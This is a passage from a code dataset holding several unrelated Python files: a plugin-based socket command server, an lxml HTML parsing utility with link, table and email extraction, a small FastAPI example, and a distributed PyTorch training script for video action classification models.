try:\r\n # Check if a following command already exists (name clash)\r\n if \"!\" + directory in self.commands:\r\n raise NameError\r\n\r\n # Attempt to add a function from a module that both have the same name as directory\r\n self.commands[\"!\" + directory] = getattr(import_module(directory + \".main\"), \"main\")\r\n\r\n # In case a module couldn't be found\r\n except ModuleNotFoundError:\r\n print(\"Could not find \\\"main\\\" module within the \" + directory + \" folder.\")\r\n\r\n # In case the directory name was resulting in an error, for example it had a dot ('.') character\r\n except TypeError:\r\n print(\"Invalid name for the \" + directory + \" directory.\")\r\n\r\n # In case a function couldn't be found\r\n except AttributeError:\r\n print(\"Could not find \\\"main\\\" function within the \" + directory + \" folder.\")\r\n\r\n # In case the given name already exists\r\n except NameError:\r\n print(\"Function !\" + directory + \" was already added to the server.\")\r\n\r\n def run(self):\r\n\r\n # Never stop the server once it was started\r\n while True:\r\n\r\n # Inform that the server is ready to receive a 
connection\r\n print(\"Waiting for a connection to {} on port {}...\".format(self.host_ip, self.port))\r\n\r\n # Wait for a connection (accept function blocks the program until a client connects to the server)\r\n self.client_socket, self.client_address = self.socket.accept()\r\n\r\n # Inform that someone has connected\r\n print(\"Client with address {} connected\".format(self.client_address))\r\n\r\n # Store the ip separate to other address details for convenience\r\n self.client_ip = self.client_address[0]\r\n\r\n # Inform the user that he is connected\r\n self.send(\"Connected! Type !help to display available commands.\" + \"\\r\\n\")\r\n\r\n while True:\r\n\r\n try:\r\n # Once connected, keep receiving the data, break in case of errors\r\n data = self.client_socket.recv(2048)\r\n except ConnectionResetError:\r\n break\r\n except ConnectionAbortedError:\r\n break\r\n\r\n # If 0-byte was received, close the connection\r\n if not data:\r\n break\r\n\r\n try:\r\n # Convert bytes to string, remove white spaces\r\n data = data.decode(\"utf-8\").strip()\r\n except UnicodeDecodeError:\r\n # Ignore if an invalid character was sent (ex. Putty's telnet sends hex characters at start)\r\n data = None\r\n\r\n # If data was valid\r\n if data:\r\n\r\n # Inform what data was received\r\n print(\"Received: \" + data)\r\n\r\n # Split the data string if so to retrieve the command and the arguments\r\n data = data.split(\" \")\r\n\r\n # Check if an existing command was requested\r\n if data[0] in self.commands:\r\n\r\n # Execute a valid command\r\n self.commands.get(data[0])(self, data)\r\n\r\n # Inform that a command was executed\r\n print(\"Command \" + data[0] + \" executed\")\r\n\r\n else:\r\n # Inform the user that an invalid command was sent\r\n self.send(\"Invalid command. Type !help to display available commands.\" + \"\\r\\n\")\r\n\r\n # Clean up\r\n self.client_socket.close()\r\n self.cache = {}\r\n\r\n # Inform that the connection is closed\r\n print(\"Connection from {} address closed successfully\".format(self.client_ip))\r\n\r\n def send(self, data):\r\n self.client_socket.sendall(str.encode(data))\r\n\r\n @staticmethod\r\n def help(server, data):\r\n\r\n # Construct the help message's header\r\n message = \"Here are the available commands:\\r\\n\"\r\n\r\n # Construct the content\r\n for command in server.commands.keys():\r\n message = message + \" - \" + command + \"\\r\\n\"\r\n\r\n # Add further help info\r\n message = message + \"To learn more about each command, type help. 
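To exercise the server above from another machine, a bare socket client is enough; the IP address below is a placeholder for the Pi's ethernet IP:

import socket

# Connect to the Pi's server (address is a placeholder).
with socket.create_connection(("192.168.0.10", 50000)) as sock:
    print(sock.recv(2048).decode())   # greeting banner
    sock.sendall(b"!help\r\n")         # ask for the command list
    print(sock.recv(2048).decode())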
\" + \"\\r\\n\"\r\n message = message + \"To add arguments to a command, type (...)\" + \"\\r\\n\"\r\n\r\n # Send the prepared message to the client\r\n server.send(message)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n s = Server()\r\n s.run()\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476625064","text":"import os.path\nimport re\nimport sys\nfrom html.parser import HTMLParser as PyHTMLParser\nfrom typing import Union, Optional, List, Callable\nfrom urllib import parse\n\nimport validators\nfrom lxml import etree\nfrom lxml.html import soupparser\n\nparser_module_path: str = ''\ntry:\n parser_module_path = os.path.dirname(os.path.realpath(__file__))\nexcept NameError:\n parser_module_path = os.path.dirname(os.path.abspath(sys.argv[0]))\n\npath_append: str = os.path.dirname(parser_module_path)\nsys.path.append(path_append) if path_append not in sys.path else 0\n\ntry:\n from .models import Elements\n from .SeleniumBrowser.Selenium_Browser.utils.utils import Arrays, Utils, Strings\nexcept ModuleNotFoundError:\n from Selenium_Parser.models import Elements\n from Selenium_Parser.SeleniumBrowser.Selenium_Browser.utils.utils import Arrays, Utils, Strings\n\n# noinspection PyProtectedMember\nElement = etree._Element\n\n\nclass MLStripper(PyHTMLParser):\n def __init__(self):\n super().__init__()\n self.reset()\n self.strict = False\n self.convert_charrefs = True\n self.fed = []\n\n def handle_data(self, d):\n self.fed.append(d)\n\n def get_data(self):\n return ''.join(self.fed)\n\n\nclass HTMLParseReq(object):\n html: str\n parsed: Element\n\n def __init__(self, html: Optional[str] = None, parsed: Optional[Element] = None):\n if html is None and parsed is None:\n raise ValueError('Cannot initiate a parse request with the HTML and parsed object set to None. '\n 'One has to be set')\n elif html is not None:\n self.html = html\n self.parsed = HTMLParser.parse(html)\n else:\n self.parsed = parsed\n self.html = etree.tostring(parsed)\n\n def get_parsed(self):\n if self.parsed is not None:\n return self.parsed\n elif self.html is not None:\n return HTMLParser.parse(self.html)\n else:\n raise ValueError('Cannot carry out a parse request with the HTML and parsed object set to None. '\n 'One has to be set')\n\n def get_html(self):\n return self.html\n\n\nclass HTMLParser(object):\n html: str\n parsed: Element\n req: HTMLParseReq\n\n def __init__(self, req: HTMLParseReq):\n self.init(req)\n\n def init(self, req: HTMLParseReq):\n self.req = req\n self.html = req.html\n self.parsed = req.get_parsed()\n\n @staticmethod\n def parse(html: Optional[str] = None) -> Union[Element, None]:\n if html is None:\n return None\n\n try:\n parsed: Element = etree.HTML(html)\n except ValueError:\n try:\n parsed = etree.XML(html)\n except ValueError:\n try:\n parsed = soupparser.fromstring(html)\n except ValueError:\n parsed = None\n return parsed\n\n @staticmethod\n # Used to get the base_url for a link\n # (e.g. 
http://www.hello.com/blah/remove?dontwant returns hello or www.hello.com)\n def get_base_site(link: str, with_suffix: bool = True) -> str:\n new_link: str = parse.urlparse(link).netloc\n if with_suffix:\n return new_link\n else:\n split_link: List[str] = new_link.split('.')\n return split_link[1] if split_link[0] == 'www' else split_link[0]\n\n @staticmethod\n def check_link(link: str, ignore_anchors: Optional[bool] = False):\n if link is None:\n return None\n\n link = link.strip()\n return None if link == '' or (ignore_anchors and link[0] == '#') else link\n\n @staticmethod\n def add_http_link(url: str) -> str:\n if not re.match(r'http(s?)\\:', url):\n url = 'http://' + url\n return url\n\n @staticmethod\n # WARNING: This produces invalid URLs according to validator.url\n # Mostly used for database entry to avoid duplicate URLs\n # TODO: Took out query object but may be necessary? Not sure\n def normalize_link(url: str, with_prefix: Optional[bool] = False) -> str:\n if not re.match(r'http(s?)\\:', url):\n url = 'http://' + url\n\n parsed = parse.urlsplit(url)\n host: str = parsed.netloc + parsed.path\n if host.startswith('www.'):\n host = host[4:]\n host = HTMLParser.add_http_link(host) if with_prefix else host\n\n return host\n\n @staticmethod\n def join_urls(child_url: str, parent_url: Optional[str] = '',\n only_valid: Optional[bool] = True) -> Union[str, None]:\n if child_url is None:\n return None\n\n child_url = parse.urljoin(parent_url, child_url)\n if child_url != parent_url and validators.url(child_url):\n child_url = HTMLParser.normalize_link(child_url, with_prefix=True)\n elif only_valid:\n child_url = None\n\n return child_url\n\n @staticmethod\n def check_and_join_links(url: str, parent_url: Optional[str] = '',\n ignore_anchors: Optional[bool] = False) -> Union[str, None]:\n link: str = HTMLParser.check_link(url, ignore_anchors=ignore_anchors)\n return HTMLParser.join_urls(link, parent_url, only_valid=True)\n\n @staticmethod\n # Gets all links from the given HTMLReq object\n def get_all_links_(req: HTMLParseReq, parent_url: Optional[str] = '', ignore_anchors: Optional[bool] = False):\n parsed: Element = req.get_parsed()\n elements: List[Element] = parsed.xpath('//a')\n\n # Get all href's from a tags, return unique URLs, and filter out any null values\n check_function: Callable[[str], str] = lambda x: HTMLParser.check_and_join_links(x, parent_url, ignore_anchors)\n temp_links = [check_function(x.attrib.get('href')) for x in elements]\n return Arrays.remove_none(list(set(temp_links)))\n\n @staticmethod\n def get_email_pattern(email_divider: str = '@'):\n return re.compile(\"[a-z0-9\\.\\-+_]+{}[a-z0-9\\.\\-+_]+\\.[a-z]+\".format(re.escape(email_divider)), re.I)\n\n @staticmethod\n def get_all_email_patterns():\n email_checks: List[str] = ['@', '(at)', '[at]', '.at.']\n return [HTMLParser.get_email_pattern(x) for x in email_checks]\n\n @staticmethod\n # TODO: Generalize for any pattern\n def get_all_emails_(html: str, all_patterns: Optional[bool] = True):\n if all_patterns:\n searches: List[str] = HTMLParser.get_all_email_patterns()\n else:\n searches = [HTMLParser.get_email_pattern(email_divider='@')]\n\n emails: List[str] = []\n for search in searches:\n emails += re.findall(search, html)\n return list(set(emails))\n\n @staticmethod\n # Checks if two URLs are returning the same HTML\n def check_equals(html_a: str, html_b: str) -> bool:\n if html_a is None or html_b is None:\n return False\n else:\n html_a = Strings.remove_whitespace(html_a)\n html_b = 
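normalize_link above deduplicates URLs by dropping the scheme and a leading www.; the same steps in isolation, on a sample URL of my own:

from urllib import parse

url = "https://www.example.com/path?q=1"
parts = parse.urlsplit(url)
host = parts.netloc + parts.path   # 'www.example.com/path'
if host.startswith("www."):
    host = host[4:]
print(host)                        # example.com/path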
Strings.remove_whitespace(html_b)\n\n return html_a == html_b\n\n @staticmethod\n def get_head(req: HTMLParseReq, remove_whitespace: Optional[bool] = False) -> Union[str, None]:\n parsed: Element = req.get_parsed()\n\n if parsed is None:\n return None\n\n element: Element = parsed.xpath('//head')\n if element is None:\n return None\n elif isinstance(element, list):\n element = element[0]\n\n head: str = element.text\n if head is None:\n return None\n\n return Strings.remove_whitespace(head) if remove_whitespace else head\n\n @staticmethod\n def get_surrounding_elements_(req: HTMLParseReq, model: Optional[Elements] = None) -> dict:\n element: Element = req.get_parsed()\n if element is None:\n return {}\n\n model = Utils.first_non_none(model, Elements())\n model.element_tag = element.tag\n model.element_text = element.text\n\n if model.element_text is None:\n model.element_text = ''\n\n parent: Element = element.getparent()\n if parent is not None:\n model.element_html = etree.tostring(parent)\n\n parent = parent.getparent()\n if parent is not None:\n model.parent_html = etree.tostring(parent)\n\n return model.to_dict()\n\n @staticmethod\n def search_for_elements_(req: HTMLParseReq, search: str, element_tag: Optional[str] = 'text()') -> List[Element]:\n parser = req.get_parsed()\n if parser is None:\n return []\n\n xpath: str = \"//*[contains({}, '{}')]\".format(element_tag, search)\n return parser.xpath(xpath)\n\n @staticmethod\n def parse_table_(req: HTMLParseReq, only_text: Optional[bool] = False,\n prefer_links: Optional[bool] = False) -> Union[List[List[Element]], List[List[str]]]:\n # Return a list of elements (instead of text/str) so can grab links if need be\n output: List[List[Element]] = []\n\n table: Element = req.get_parsed()\n if table is None or table.tag != 'table':\n return output\n\n # Get all table sections - ignore thead vs tbody for now\n table_sections: List[Element] = Arrays.listify(table.xpath('.//*[self::thead or self::tbody]'))\n\n for section in table_sections:\n # Get all rows\n rows: List[Element] = Arrays.listify(section.xpath('.//tr'))\n for row in rows:\n # Get all datum values - ignore th vs td for now - and append to output\n table_datums: List[Element] = Arrays.listify(row.xpath('.//*[self::th or self::td]'))\n if prefer_links:\n for idx in range(len(table_datums)):\n datum: Element = table_datums[idx]\n link_check: Element = Arrays.first(datum.xpath('.//a'))\n if link_check is not None:\n table_datums[idx] = link_check\n\n if only_text:\n output.append([x.text for x in table_datums])\n else:\n output.append(table_datums)\n\n return output\n\n @staticmethod\n def strip_tags(html: str) -> str:\n stripper = MLStripper()\n stripper.feed(html)\n return stripper.get_data()\n\n def get_all_emails(self, all_patterns: Optional[bool] = True) -> List[str]:\n return HTMLParser.get_all_emails_(self.html, all_patterns)\n\n def get_all_links(self, parent_url: Optional[str] = None,\n ignore_anchors: Optional[bool] = False) -> Union[List[str], None]:\n return HTMLParser.get_all_links_(self.req, parent_url, ignore_anchors)\n\n def get_surrounding_elements(self, model: Optional[Elements] = None) -> dict:\n return HTMLParser.get_surrounding_elements_(self.req, model=model)\n\n def search_for_elements(self, search: str, element_tag: Optional[str] = 'text()') -> List[Element]:\n return HTMLParser.search_for_elements_(self.req, search, element_tag=element_tag)\n\n def parse_table(self, only_text: Optional[bool] = False,\n prefer_links: Optional[bool] = False) -> 
List[List[Element]]:\n return HTMLParser.parse_table_(self.req, only_text=only_text, prefer_links=prefer_links)\n\n def get_parser(self) -> Element:\n return self.parsed\n\n def set_html_by_xpath(self, xpath: str) -> Element:\n item: Element = Arrays.first(self.get_parser().xpath(xpath))\n self.req = HTMLParseReq(parsed=item)\n self.init(self.req)\n return item\n","sub_path":"Selenium_Parser/HTMLParser.py","file_name":"HTMLParser.py","file_ext":"py","file_size_in_byte":11590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"451469701","text":"from fastapi import FastAPI\nfrom typing import Optional\n\nfrom enum import Enum\n\nfake_items_db = [{\"item_name\": \"Foo\"}, {\"item_name\": \"Bar\"}, {\"item_name\": \"Baz\"}]\n\n\nclass ModelName(str, Enum):\n alexnet = \"alexnet\"\n resnet = \"resnet\"\n lenet = \"lenet\"\n\n\napp = FastAPI()\n\n\n@app.get(\"/items/\")\nasync def read_items(\n skip: int = 0, limit: int = 10\n): # URL query parameters: /items/?skip=0&limit=10\n return fake_items_db[skip : skip + limit]\n\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello World\"}\n\n\n@app.get(\"/items/{item_id}\")\nasync def read_item(item_id: str, q: Optional[str] = None):\n return {\"item_id\": item_id}\n\n\n@app.get(\"/users/me\")\nasync def read_user_me():\n return {\"user_id\": \"the current user\"}\n\n\n@app.get(\"/users/{user_id}\")\nasync def read_user(user_id: str):\n return {\"user_id\": user_id}\n\n\n@app.get(\"/model/{model_name}\")\nasync def get_model(model_name: ModelName):\n if model_name == ModelName.alexnet:\n return {\"model_name\": model_name, \"message\": \"Deep Learning FTW!\"}\n\n if model_name.value == \"lenet\":\n return {\"model_name\": model_name, \"message\": \"LeCNN all the images\"}\n\n return {\"model_name\": model_name, \"message\": \"Have some residuals\"}","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"624991277","text":"import os\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" \nos.environ[\"CUDA_VISIBLE_DEVICES\"]= '0, 1, 2, 3'\nimport sys\nimport argparse\nimport logging\nimport time\nimport datetime\nfrom collections import defaultdict\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\n\nimport torch.distributed as dist\n\nfrom datasets.build import make_dataloader\nimport numpy as np\nfrom pytorch_i3d import InceptionI3d\nfrom torchvision.models.video import r3d_18, mc3_18, r2plus1d_18\nfrom pytorch_c3d import C3D\n\n# from charades_dataset import Charades as Dataset\nfrom tqdm import tqdm\nfrom model_serialization import load_state_dict\nfrom detection.utils.logger import Logger\nfrom detection.utils.metric_logger import MetricLogger\nfrom detection.utils.comm import synchronize, get_rank\n\nfrom mpi4py import MPI\nimport apex\nfrom apex.parallel import DistributedDataParallel as DDP\nfrom detection.utils.comm import get_world_size\nfrom detection.utils.comm import is_main_process, all_gather, synchronize\n\nfrom datasets.evaluation.evaluation import ActionClassificationEvaluator\nfrom sklearn.metrics import ConfusionMatrixDisplay\nimport pickle as pkl\nimport pdb\n\nnp.set_printoptions(precision=3)\n\ndef reduce_loss_dict(loss_dict):\n \"\"\"\n Reduce the loss dictionary from all processes 
so that process with rank\n 0 has the averaged results. Returns a dict with the same fields as\n loss_dict, after reduction.\n \"\"\"\n world_size = get_world_size()\n if world_size < 2:\n return loss_dict\n with torch.no_grad():\n loss_names = []\n all_losses = []\n for k in sorted(loss_dict.keys()):\n loss_names.append(k)\n all_losses.append(loss_dict[k])\n # print(\"all_losses:\", all_losses)\n # print(\"\\n\")\n all_losses = torch.stack(all_losses, dim=0)\n if torch.isnan(torch.sum(all_losses)):\n pdb.set_trace()\n dist.reduce(all_losses, dst=0)\n if torch.isnan(torch.sum(all_losses)):\n pdb.set_trace()\n if dist.get_rank() == 0:\n # only main process gets accumulated, so only divide by\n # world_size in this case\n all_losses /= world_size\n \n reduced_losses = {k: v for k, v in zip(loss_names, all_losses)}\n return reduced_losses\n\ndef loss_func(pred, target):\n # sigmoid\n # bce_loss = F.binary_cross_entropy_with_logits(pred, target)\n # softmax\n ce_loss = F.cross_entropy(pred, target)\n return ce_loss\n\ndef do_train(model_name,\n model, \n train_dataloader, \n val_dataloader, \n device,\n checkpoint_peroid=1000, \n save_model='', \n logger=None, \n distributed=False,\n evaluator=None):\n\n lr = 0.01 #0.003 #init_lr\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9, weight_decay=0.0000001)\n # NOTE: maybe the weight decay is too soon?\n lr_sched = optim.lr_scheduler.MultiStepLR(optimizer, [4000, 8000])\n\n num_steps_per_update = 1 #4 # accum gradient\n steps = 0\n\n tot_loc_loss = 0.0\n tot_cls_loss = 0.0\n\n if logger is None:\n logger = logging.getLogger(\"I3D.trainer\")\n logger.info(\"Start training\")\n meters = MetricLogger(delimiter=\" \")\n end = time.time()\n\n max_iters = len(train_dataloader)\n model.train()\n optimizer.zero_grad()\n # label_counts = defaultdict(int)\n for iters, data in enumerate(tqdm(train_dataloader)):\n data_time = time.time() - end\n iters += 1\n\n # get the inputs\n # inputs, labels, video_names, _, _ = data\n inputs, labels, video_names = data\n # wrap them in Variable\n inputs = Variable(inputs.to(device))\n t = inputs.size(2)\n labels = Variable(labels.to(device))\n per_frame_logits = model(inputs) # inputs: B X C X T X H X W\n # pdb.set_trace()\n if len(per_frame_logits.shape) == 3:\n per_frame_logits = per_frame_logits.mean(dim=-1) # B X C\n\n loss = loss_func(per_frame_logits, labels)\n # track time\n batch_time = time.time() - end\n \n # reduce losses over all GPUs for logging purposes\n loss_dict = {\"loss_cls\": loss} #{\"loss_loc\": loc_loss, \"loss_cls\": cls_loss}\n loss_dict_reduced = reduce_loss_dict(loss_dict)\n losses_reduced = loss_dict_reduced['loss_cls'] #0.5 * loss_dict_reduced['loss_loc'] + 0.5 * loss_dict_reduced['loss_cls']\n\n loss.backward()\n grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), 5)\n\n meters.update(loss=losses_reduced, **loss_dict_reduced)\n meters.update(time=batch_time, data=data_time)\n\n # estimate the rest of the running time\n eta_seconds = meters.time.global_avg * (max_iters - iters)\n eta_string = str(datetime.timedelta(seconds=int(eta_seconds)))\n\n if iters % num_steps_per_update == 0 or iters == len(train_dataloader):\n steps += 1\n optimizer.step()\n optimizer.zero_grad()\n\n lr_sched.step()\n if steps % 1 == 0:\n # NOTE: Add log file \n info = meters.delimiter.join(\n [\n \"eta: {eta}\",\n \"iter: {iter}\",\n \"{meters}\",\n \"lr: {lr:.6f}\",\n \"max mem: {memory:.0f}\",\n ]\n ).format(\n eta=eta_string,\n iter=iters,\n meters=str(meters),\n 
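reduce_loss_dict above works because the losses are stacked in a fixed (sorted-key) order, so a single dist.reduce call can sum every loss at once and rank 0 can divide by the world size. A single-process simulation of that bookkeeping with two fake ranks (no process group needed; the values are made up):

import torch

# Two fake "ranks" worth of losses; in the real code these live on different
# GPUs and dist.reduce sums them onto rank 0.
rank_losses = [{"loss_cls": torch.tensor(0.8)}, {"loss_cls": torch.tensor(0.4)}]
world_size = len(rank_losses)

names = sorted(rank_losses[0].keys())
stacked = torch.stack([torch.stack([d[k] for k in names]) for d in rank_losses])
summed = stacked.sum(dim=0) / world_size   # what rank 0 holds after the reduce
reduced = {k: v for k, v in zip(names, summed)}
print(reduced)                             # {'loss_cls': tensor(0.6000)}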
lr=optimizer.param_groups[0][\"lr\"],\n memory=torch.cuda.max_memory_allocated() / 1024.0 / 1024.0,\n )\n \n if hasattr(logger, 'log_values'):\n logger.info(info) \n for name, meter in meters.meters.items():\n logger.log_values({name: meter.median}, step=iters)\n logger.log_values({\"grad_norm\": grad_norm}, step=iters)\n else:\n print(info)\n \n if steps % checkpoint_peroid == 0:\n del inputs, loss\n model.eval()\n do_val(model_name,\n model, \n val_dataloader, \n device,\n distributed, \n logger, \n output_dir=os.path.join(save_model, 'inference'),\n train_iters=iters,\n evaluator=evaluator)\n model.train()\n \n if get_rank() == 0: # only save model for rank0\n if not os.path.isdir(save_model):\n os.makedirs(save_model)\n \n save_dir = os.path.join(save_model, str(steps).zfill(6)+'.pt')\n if hasattr(model, 'module'):\n torch.save(model.module.state_dict(), save_dir)\n else:\n torch.save(model.state_dict(), save_dir)\n\n end = time.time()\ndef do_val(model_name,\n model, \n val_dataloader, \n device, \n distributed=False,\n logger=None, \n output_dir='', \n train_iters=0, \n evaluator=None):\n if logger is None:\n logger = logging.getLogger(\"I3D.trainer\")\n\n torch.cuda.empty_cache() # TODO check if it helps\n\n tot_loc_loss = 0.0\n tot_cls_loss = 0.0\n \n # run on dataset\n results = defaultdict(list)\n target_labels = {}\n for iters, data in enumerate(tqdm(val_dataloader)):\n # get the inputs\n # inputs, labels, video_names, start, end = data\n inputs, labels, video_names= data\n # wrap them in Variable\n inputs = inputs.to(device)\n t = inputs.size(2)\n labels = labels.to(device)\n\n per_frame_logits = model(inputs)\n if len(per_frame_logits.shape) == 3:\n per_frame_logits = per_frame_logits.mean(dim=-1)\n\n loss = loss_func(per_frame_logits, labels)\n loss = loss.item() #(0.5*loc_loss + 0.5*cls_loss)\n tot_cls_loss += loss\n # collect results\n per_frame_logits = F.softmax(per_frame_logits, dim=1).detach().cpu()\n for batch_id, vid in enumerate(video_names):\n # frame_id = int((start[batch_id] + end[batch_id])/2)\n # pred = per_frame_logits[batch_id]\n # if vid not in results:\n # results[vid] = {}\n # assert frame_id not in results[vid]\n # results[vid][frame_id] = pred\n pred = per_frame_logits[batch_id]\n results[vid].append(pred)\n target_labels[vid] = int(labels[batch_id].detach().cpu())\n\n if hasattr(logger, 'log_values'):\n logger.log_values({\"loss_cls_val\": tot_cls_loss/(iters+1)}, step=train_iters) \n\n results = _accumulate_from_multiple_gpus(results)\n if not is_main_process():\n return\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n # torch.save(results, os.path.join(output_dir, 'predictions.pth'))\n # Run video-level evaluation\n per_vid_confusion_matrix = np.zeros((16, 16))\n per_clip_confusion_matrix = np.zeros((16, 16))\n per_vid_top3_acc = np.zeros(16)\n per_clip_top3_acc = np.zeros(16)\n per_class_clip_num = np.zeros(16)\n # Save per video prediction\n all_per_vid_results = {}\n for vid in results.keys():\n # ----------\n # NOTE: add clip-level accuracy\n clip_results = torch.stack(results[vid], dim=0)\n for per_clip_result in clip_results:\n _, sorted_pred = torch.sort(per_clip_result, descending=True)\n top1_pred = sorted_pred[0]\n top3_pred = sorted_pred[:3]\n y_true = target_labels[vid]\n per_class_clip_num[y_true] += 1\n per_clip_confusion_matrix[y_true, top1_pred] += 1\n if y_true in top3_pred:\n per_clip_top3_acc[y_true] += 1\n # ---------\n\n # ---------\n # per video results\n per_vid_results = torch.stack(results[vid], 
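# Average the per-clip softmax scores over all clips of this video
# (dim 0 indexes the clips) to obtain one video-level prediction.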
dim=0).mean(dim=0)\n        all_per_vid_results[vid] = per_vid_results\n        _, sorted_pred = torch.sort(per_vid_results, descending=True)\n        top1_pred = sorted_pred[0]\n        top3_pred = sorted_pred[:3]\n        y_true = target_labels[vid]\n        per_vid_confusion_matrix[y_true, top1_pred] += 1\n        if y_true in top3_pred:\n            per_vid_top3_acc[y_true] += 1\n        # ---------\n    \n    # Save per video prediction\n    pkl.dump(all_per_vid_results, open(os.path.join('/u/bryao/work/DATA/i3d_outputs', model_name, 'per_video_results.pkl'), 'wb'))\n\n    # per clip results\n    per_clip_top_1_acc = per_clip_confusion_matrix.diagonal() / (per_clip_confusion_matrix.sum(axis=1) + 1e-6)\n    per_clip_top_3_acc = np.array([num/per_class_clip_num[i] for i, num in enumerate(per_clip_top3_acc)])\n    logger.info(\"Clip-level evaluation:\")\n    per_clip_result = \"Top 1 acc: {}, Top 3 acc: {}, per_cls_acc: {}\".format(np.around(per_clip_top_1_acc.mean(), 3), \n                                                                            np.around(per_clip_top_3_acc.mean(), 3), \n                                                                            np.around(per_clip_top_1_acc, 3))\n    logger.info(per_clip_result)\n    print(per_clip_result)\n    print(\"confusion matrix:\", np.around(per_clip_confusion_matrix, 3))\n    # np.save('/u/bryao/work/DATA/i3d_outputs/r2plus1d_18/confusion_matrix_7000.npy', per_clip_confusion_matrix)\n    if hasattr(logger, 'log_values'):\n        logger.log_values({'Per clip Top 1 Acc': per_clip_top_1_acc.mean()}, step=train_iters)\n        logger.log_values({'Per clip Top 3 Acc': per_clip_top_3_acc.mean()}, step=train_iters)\n\n    # per video results\n    data_category_stats = val_dataloader.dataset.data_category_stats\n    top_1_acc = per_vid_confusion_matrix.diagonal() / (per_vid_confusion_matrix.sum(axis=1) + 1e-6)\n    top_3_acc = np.array([num/data_category_stats[i] for i, num in enumerate(per_vid_top3_acc)])\n    logger.info(\"Video-level evaluation:\")\n    per_vid_result = \"Top 1 acc: {}, Top 3 acc: {}, per_cls_acc: {}\".format(np.around(top_1_acc.mean(), 3), \n                                                                           np.around(top_3_acc.mean(), 3), \n                                                                           np.around(top_1_acc, 3))\n    logger.info(per_vid_result)\n    print(per_vid_result)\n    if hasattr(logger, 'log_values'):\n        logger.log_values({'Per vid Top 1 Acc': top_1_acc.mean()}, step=train_iters)\n        logger.log_values({'Per vid Top 3 Acc': top_3_acc.mean()}, step=train_iters)\n\n\n    # # Run video-level evaluation\n    # eval_results = evaluator.evaluate(results)\n    # for k, v in eval_results.items():\n    #     logger.info('{}:{}'.format(k, v))\n    #     if isinstance(v, (float, int)) and hasattr(logger, 'log_values'):\n    #         logger.log_values(eval_results, step=train_iters)\n\n    # if 'confusion_matrix' in eval_results:\n    #     cm_display = ConfusionMatrixDisplay(eval_results['confusion_matrix'], \n    #                                         display_labels=val_dataloader.dataset.name_shorts)\n    #     ret = cm_display.plot(fontsize=6)\n    #     logger.log_plot(ret.figure_, label='Confusion Matrix',step=train_iters)\n\ndef _accumulate_from_multiple_gpus(item_per_gpu):\n    # all_keys\n    all_items = all_gather(item_per_gpu)\n    if not is_main_process():\n        return\n    # merge the list of dicts\n    predictions = {}\n    for p in all_items:\n        predictions.update(p)\n    return predictions\n\ndef run(model_name='i3d',\n        init_lr=0.1, \n        gpu_id=0,\n        max_steps=64e3, \n        batch_per_gpu=4,\n        mode='rgb', \n        root='/home/data/vision7/A3D_2.0/frames/', #'/ssd/Charades_v1_rgb', \n        train_split='A3D_2.0_train.json', #'charades/charades.json', \n        val_split='A3D_2.0_val.json',\n        checkpoint_peroid=1000,\n        save_model='',\n        with_normal=True):\n\n    \n    num_gpus = MPI.COMM_WORLD.Get_size()\n    distributed = False\n    if num_gpus > 1:\n        distributed = True\n\n    local_rank = MPI.COMM_WORLD.Get_rank() % torch.cuda.device_count()\n\n    if distributed:\n
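        # one process per GPU: MPI supplies the rank and world size, and every\n        # rank joins the NCCL process group by rendezvousing at MASTER_ADDR:12345\n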
torch.cuda.set_device(local_rank)\n host = os.environ[\"MASTER_ADDR\"] if \"MASTER_ADDR\" in os.environ else \"127.0.0.1\"\n torch.distributed.init_process_group(\n backend=\"nccl\",\n init_method='tcp://{}:12345'.format(host),\n rank=MPI.COMM_WORLD.Get_rank(),\n world_size=MPI.COMM_WORLD.Get_size()\n )\n\n synchronize()\n # logger must be initialized after distributed!\n cfg = {'PROJECT': 'i3d_a3d'}\n if args.use_wandb:\n logger = Logger(\"I3D\",\n cfg,#convert_to_dict(cfg, []),\n project = 'i3d_a3d',\n viz_backend=\"wandb\" \n )\n else:\n logger = logging.Logger('I3D')\n\n logger.info(\"Using {} GPUs\".format(num_gpus))\n # setup dataset\n\n train_dataloader = make_dataloader(root,\n train_split, \n mode,\n model_name,\n seq_len=16, #64,\n overlap=15, #32,\n phase='train', \n max_iters=10000, \n batch_per_gpu=batch_per_gpu, #8,\n num_workers=16, \n shuffle=True, \n distributed=distributed,\n with_normal=with_normal)\n\n val_dataloader = make_dataloader(root,\n val_split, \n mode,\n model_name,\n seq_len=16, #64, \n overlap=15, #32,\n phase='val', \n max_iters=None, \n batch_per_gpu=batch_per_gpu, #8,\n num_workers=16, \n shuffle=False, \n distributed=distributed,\n with_normal=with_normal)\n # setup the model\n # set dropout_keep_prob=0.0 for overfit\n logger.info(\"Running {} model\".format(model_name))\n if model_name == 'i3d':\n if mode == 'flow':\n model = InceptionI3d(train_dataloader.dataset.num_classes, in_channels=2, dropout_keep_prob=0.5)\n load_state_dict(model, torch.load('models/flow_imagenet.pt'), ignored_prefix='logits')\n logger.info(\"Loaded pretrained I3D\")\n else:\n model = InceptionI3d(train_dataloader.dataset.num_classes, in_channels=3, dropout_keep_prob=0.5)\n load_state_dict(model, torch.load('models/rgb_imagenet.pt'), ignored_prefix='logits')\n logger.info(\"Loaded pretrained I3D\")\n model.replace_logits(train_dataloader.dataset.num_classes)\n elif model_name == 'r3d_18':\n model = r3d_18(pretrained=True, num_classes=train_dataloader.dataset.num_classes)\n elif model_name == 'mc3_18':\n model = mc3_18(pretrained=True, num_classes=train_dataloader.dataset.num_classes)\n elif model_name == 'r2plus1d_18':\n model = r2plus1d_18(pretrained=True, num_classes=train_dataloader.dataset.num_classes)\n elif model_name == 'c3d':\n model = C3D(pretrained=True, 